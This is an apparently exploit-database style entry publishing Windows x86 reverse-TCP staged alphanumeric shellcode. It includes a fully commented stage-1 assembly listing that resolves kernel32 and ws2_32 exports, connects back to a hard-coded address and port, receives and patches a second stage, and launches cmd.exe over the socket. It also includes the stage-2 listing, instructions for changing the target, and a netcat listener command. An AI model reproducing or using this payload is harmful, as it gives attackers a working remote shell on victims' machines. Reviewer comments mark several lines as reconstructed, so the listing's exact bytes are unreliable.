Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)

Author: Snir Levi Published: 2017-03-02 Verified: Verified



########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
            ########### Author: Snir Levi, Applitects #############
                                ## 332 Bytes ##
                    ## For Educational Purposes Only ##
Date: 01.03.17
Author: Snir Levi
IP -    127.0.0.1 (hard-coded in stage 1: `shl edx,24` / `mov dl,0x7f` builds 0x0100007f; change those two instructions for another target)
PORT -  4444    (hard-coded in stage 1 as `push word 0x5c11`, i.e. htons(4444))
Tested on:
Windows 7
Windows 10
                The victim executes the first-stage shellcode, which opens a TCP connection back to the listener (127.0.0.1:4444 as published).
                After the connection is established, send the alphanumeric stage into that connection. Stage 1 overwrites the last byte it receives with a `ret` (0xc3), so one extra byte must follow the stage's final `S` (the newline nc sends when you press Enter is enough); a short or partial recv() is not handled.
                nc -lvp 4444
                connect to [] from localhost [] (port)
                Microsoft Windows [Version 10.0.14393]
                (c) 2016 Microsoft Corporation. All rights reserved.
#### Second Stage Alphanumeric shellcode: #####
R       push edx
P       push eax
hoces   push 0x7365636f //oces
htePr   push 0x72506574 //tePr
hCrea   push 0x61657243 //Crea
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
L*8     dec esp // offset esp to kernel32.dll Address
Y       pop ecx // ecx = kernel32
F*4     inc esi -> offset [esi+4]
PX      will be replaced with mov [esi],eax (0x0689)
N*4     dec esi -> offset [esi]
j0      push 0x30
X       pop eax
H*48    dec eax  // zeroing eax
P       push eax
hessA   push 0x41737365 //essA (will be null terminated)
hProc   push 0x636f7250 //Proc
hExit   push 0x74697845 //Exit
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
F*8     inc esi -> offset [esi+8]
PX      will be replaced with mov [esi],eax (0x0689)
Z*10    offset stack to &processinfo
j0      push 0x30
Y       pop ecx
I*48    dec ecx  // zeroing ecx
T       push esp
X       pop eax  //eax = &PROCESS_INFORMATION
Q*4     push ecx //sub esp,16
W       push edi // edi = socket handle left by stage 1; these three pushes become hStdError, hStdOutput, hStdInput
W       push edi
W       push edi
Q       push ecx
Q       push ecx
B       inc edx  // edx arrives as 0xff from stage 1 -> 0x100 = STARTF_USESTDHANDLES
R       push edx // dwFlags
Q*10    push ecx
jD      push 0x44
T       push esp
Z       pop edx  //edx = &STARTUPINFOA
hexeC   push 0x43657865 //exeC
hcmd.   push 0x2e646d63 //cmd.  -> "cmd.exeC" on the stack
T       push esp // &'cmd.exe' (the trailing 'C' is overwritten with NUL by stage 1 after this stage returns)
Y       pop ecx
P       push eax // &PROCESS_INFORMATION
R       push edx // &STARTUPINFOA
j0      push 0x30
Z       pop edx
J*48    dec edx // zeroing edx
R*3     push edx
B       inc edx
R       push edx
J       dec edx
R*2     push edx
Q       push ecx ; &'cmd.exe'
R       push edx
A*7     inc ecx //ecx = &"cmd.exeC" + 7, i.e. the trailing 'C'; stage 1 writes NUL there (mov [ecx],dl) to terminate 'cmd.exe'
N*4     dec esi //esi back to [esi+4] -> CreateProcessA (stage 1 calls [esi] right after the return)
S       push ebx ; return address into stage 1 (saved by the `pop ebx` that stage 1 prepends). Stage 1 replaces the LAST received byte with ret (0xc3), so this `S` must not be the final byte sent: append one trailing byte (e.g. the newline nc appends).
## First Stage Shellcode ##
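global _start
section .text
; ---------------------------------------------------------------------------
; Stage 1 of the reverse-TCP stager (NASM / Intel syntax, 32-bit Windows).
; Resolves kernel32/ws2_32 exports by hand, connects to 127.0.0.1:4444,
; receives the alphanumeric stage 2 into a stack buffer, patches it in place,
; runs it, then calls CreateProcessA("cmd.exe") with the socket as the std
; handles and finally ExitProcess. Never returns.
;
; Register roles once the resolver is done:
;   ebx = kernel32.dll base          esi = 32-byte function-pointer table (on the stack)
;   ebp = ws2_32.dll base, later (&stage-2 buffer - 1)
;   edi = 0 (NUL source), later the connected SOCKET
; Function-pointer table at esi:
;   [esi+0]  GetProcAddress   [esi+4]  CreateProcessA (stored by stage 2)
;   [esi+8]  ExitProcess      (stored by stage 2)
;   [esi+12] WSAStartup       [esi+16] WSASocketA    [esi+20] connect
;   [esi+24] recv             [esi+28] kernel32 base
;
; NOTE(review): the published listing omitted five lines that the rest of the
; code requires (`_start:`, two `lodsd`, the `getProcAddress:` label and the
; `mov eax,[esi+edx*4]` name load). They are reconstructed below and marked;
; verify against the original before relying on the byte count.
;
; Deployment caveats (nothing below checks a return value):
;   - a failed connect()/recv() is not detected; recv's return (eax) is used
;     blindly to place the terminating `ret`, and a short read leaves stage 2
;     truncated with the `ret` in the middle of it.
;   - stage 2 is received into [esp-950] and executed with `call ebp`, so the
;     host process needs an executable stack (DEP/NX off). That buffer also
;     overlaps the region the recv() call chain uses for its own frames; it
;     works empirically for a payload well under 950 bytes but is fragile.
;   - 16-bit operand forms (`sub sp`, `mov cx/ax`) are used to avoid NUL bytes;
;     `sub sp,700` wraps inside the low 16 bits of esp if (esp & 0xffff) < 700.
;   - the last received byte is replaced by `ret`, so the sender must append one
;     byte after stage 2's final `S` (the newline nc sends on Enter suffices).
; ---------------------------------------------------------------------------
_start:                                 ; NOTE(review): reconstructed (declared `global` above, never defined)
    xor eax,eax
    push eax                            ; author's note: null terminator for CreateProcessA
    ;------ kernel32.dll base via the PEB loader list ------
    mov eax,[fs:eax+0x30]               ; eax = PEB (eax=0 as base keeps the displacement one byte, no NULs)
    mov eax,[eax+0xc]                   ; eax = PEB->Ldr
    mov esi,[eax+0x14]                  ; esi = InMemoryOrderModuleList.Flink (1st entry = the exe itself)
    lodsd                               ; NOTE(review): reconstructed; eax = 2nd entry (ntdll)
    xchg esi,eax
    lodsd                               ; NOTE(review): reconstructed; eax = 3rd entry (kernel32 on Win7/Win10).
                                        ; Without the two lodsd the next load would be the exe's own base, not kernel32.
    mov ebx,[eax+0x10]                  ; ebx = DllBase (entry+0x18, seen from InMemoryOrderLinks at entry+0x8)
    ;------ walk kernel32's export name table for "GetProcA..." ------
    mov ecx,[ebx+0x3c]                  ; IMAGE_DOS_HEADER.e_lfanew
    add ecx, ebx                        ; ecx = IMAGE_NT_HEADERS
    mov ecx, [ecx+0x78]                 ; DataDirectory[EXPORT].VirtualAddress
    add ecx,ebx                         ; ecx = IMAGE_EXPORT_DIRECTORY
    mov esi,[ecx+0x20]                  ; AddressOfNames RVA
    add esi,ebx                         ; esi = array of name RVAs
    xor edx,edx                         ; edx = name index; pre-incremented, so the scan starts at index 1
getProcAddress:                         ; NOTE(review): reconstructed label (both `jne` below reference it)
        inc edx
        mov eax,[esi+edx*4]             ; NOTE(review): reconstructed; eax = names[edx] RVA (listing compared [eax] without loading it)
        add eax,ebx                     ; eax = &name string
        cmp dword [eax],'GetP'
        jne getProcAddress
        cmp dword [eax+4],'rocA'        ; assumes the first export matching "GetProcA" is GetProcAddress (names are sorted)
        jne getProcAddress
    ; edx = index of the matching name
    mov esi,[ecx+0x1c]                  ; AddressOfFunctions RVA
    add esi,ebx
    mov edx,[esi+edx*4]                 ; functions[name index] - skips AddressOfNameOrdinals ([ecx+0x24]);
                                        ; correct only while ordinals[i] == i for this export (holds on the tested builds, not guaranteed)
    add edx,ebx                         ; edx = GetProcAddress
    ;------ function-pointer table on the stack ------
    sub esp, 32                         ; 32 bytes, layout in the header comment
    push esp
    pop esi                             ; esi = &table
    mov [esp],edx                       ; [esi+0]  = GetProcAddress
    mov [esi+28],ebx                    ; [esi+28] = kernel32 base (re-read before calling stage 2)
    ;------ LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA") ------
    xor edi,edi
    push edi                            ; NUL terminator
    push 0x41797261                     ; "aryA"
    push 0x7262694c                     ; "Libr"
    push 0x64616f4c                     ; "Load"   -> "LoadLibraryA\0"
    push esp                            ; lpProcName
    push ebx                            ; hModule = kernel32
    call [esi]                          ; eax = LoadLibraryA (stdcall pops the two args; the string stays on the stack)
    ;------ ebp = LoadLibraryA("ws2_32") ------
    xor ecx,ecx
    push ecx
    mov cx, 0x3233                      ; "32" (16-bit move keeps the immediate NUL-free)
    push ecx                            ; "32\0\0"
    push 0x5f327377                     ; "ws2_"   -> "ws2_32\0"
    push esp                            ; lpLibFileName
    call eax
    mov ebp,eax                         ; ebp = ws2_32.dll base
    ;------ [esi+12] = GetProcAddress(ws2_32, "WSAStartup") ------
    xor ecx,ecx
    push ecx
    mov cx, 0x7075                      ; "up"
    push ecx
    push 0x74726174                     ; "tart"
    push 0x53415357                     ; "WSAS"   -> "WSAStartup\0"
    push esp
    push ebp
    call [esi]
    mov [esi+12],eax
    ;------ [esi+16] = GetProcAddress(ws2_32, "WSASocketA") ------
    xor ecx,ecx
    push ecx
    mov cx, 0x4174                      ; "tA"
    push ecx
    push 0x656b636f                     ; "ocke"
    push 0x53415357                     ; "WSAS"   -> "WSASocketA\0"
    push esp
    push ebp
    call [esi]
    mov [esi+16],eax
    ;------ [esi+20] = GetProcAddress(ws2_32, "connect") ------
    push edi                            ; NUL padding (edi is still 0)
    mov ecx, 0x74636565                 ; "ectt"; shifted below to "ect\0" so the immediate carries no NUL
    shr ecx, 8
    push ecx
    push 0x6e6e6f63                     ; "conn"   -> "connect\0"
    push esp
    push ebp
    call [esi]
    mov [esi+20],eax
    ;------ [esi+24] = GetProcAddress(ws2_32, "recv") ------
    push edi
    push 0x76636572                     ; "recv"   -> "recv\0"
    push esp
    push ebp
    call [esi]
    mov [esi+24],eax
    ;------ WSAStartup(0x0202, &wsaData) ------
    xor ecx,ecx
    sub sp,700                          ; scratch for the WSADATA out-param (16-bit op: NUL-free, but see wrap caveat above)
    push esp                            ; lpWSAData
    mov cx,514                          ; wVersionRequested = 0x0202
    push ecx
    call [esi+12]                       ; eax = 0 on success; that zero is reused below, never checked
    ;------ WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0) ------
    push eax                            ; dwFlags = 0      (assumes eax == 0 from WSAStartup)
    push eax                            ; g = 0
    push eax                            ; lpProtocolInfo = NULL
    mov al,6
    push eax                            ; protocol = IPPROTO_TCP
    mov al,1
    push eax                            ; type = SOCK_STREAM
    inc eax
    push eax                            ; af = AF_INET
    call [esi+16]
    xchg eax, edi                       ; edi = SOCKET (INVALID_SOCKET on failure, not checked)
    ;------ connect(s, &{AF_INET, htons(4444), 127.0.0.1}, 16) ------
    push byte 0x1
    pop edx
    shl edx, 24                         ; edx = 0x01000000
    mov dl, 0x7f                        ; edx = 0x0100007f = 127.0.0.1 in network byte order (change here for another target)
    push edx                            ; sin_addr
    push word 0x5c11                    ; sin_port = htons(4444)
    push word 0x2                       ; sin_family = AF_INET
    mov edx,esp                         ; edx = &sockaddr_in (sin_zero[8] is not initialised; ignored for AF_INET)
    push byte 16                        ; namelen = sizeof(sockaddr_in)
    push edx                            ; name
    push edi                            ; s
    call [esi+20]                       ; eax = 0 on success; reused as recv's flags, never checked
    ;------ recv(s, esp-950, 950, 0) ------
    push eax                            ; flags = 0 (assumes connect() returned 0)
    mov ax,950                          ; len = 950 (16-bit write; only sane because eax was 0)
    push eax
    push esp
    pop ebp
    sub ebp,eax                         ; ebp = esp - 950: the buffer lives below the stack pointer
    push ebp                            ; buf
    push edi                            ; s
    call [esi+24]                       ; eax = bytes received (SOCKET_ERROR on failure, not checked)
    ;------ patch stage 2 in place (offsets match the `PX` placeholders of the listing) ------
    xor edx,edx
    mov byte [ebp+eax-1],0xc3           ; last received byte -> ret (hence the extra trailing byte the sender must add)
    mov byte [ebp+96],dl                ; 'A' of "ExitProcessA" (stage-2 offset 96) -> NUL
    mov byte [ebp-1],0x5b               ; prepend `pop ebx`: stage 2 keeps its return address in ebx
    dec ebp                             ; ebp = stage-2 entry point (the pop ebx)
    mov word [ebp+20],0x16ff            ; stage-2 offset 19:  PX -> call dword [esi]  (GetProcAddress "CreateProcessA")
    mov word [ebp+35],0x0689            ; stage-2 offset 34:  PX -> mov [esi],eax     (store at table+4)
    mov word [ebp+110],0x16ff           ; stage-2 offset 109: PX -> call dword [esi]  (GetProcAddress "ExitProcess")
    mov word [ebp+120],0x0689           ; stage-2 offset 119: PX -> mov [esi],eax     (store at table+8)
    ;------ register inputs stage 2 relies on ------
    mov ax,0x4173                       ; eax = "sA\0\0" (upper word is 0 since eax < 0x10000): completes "CreateProces"+"sA"
    mov ecx,[esi+28]                    ; ecx = kernel32 (hModule for stage 2's two GetProcAddress calls)
    dec dl                              ; edx = 0xff; stage 2's `inc edx` turns it into 0x100 = STARTF_USESTDHANDLES
    call ebp                            ; run stage 2. It returns via push ebx / ret with CreateProcessA's arguments
                                        ; on the stack, esi advanced to table+4, edx == 0, ecx -> trailing 'C' of "cmd.exeC"
    mov [ecx],dl                        ; NUL-terminate "cmd.exe"
    call dword [esi]                    ; CreateProcessA(NULL, "cmd.exe", ...) - arguments pushed by stage 2
    push eax                            ; uExitCode = CreateProcessA result
    call dword [esi+4]                  ; ExitProcess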
unsigned char shellcode[]=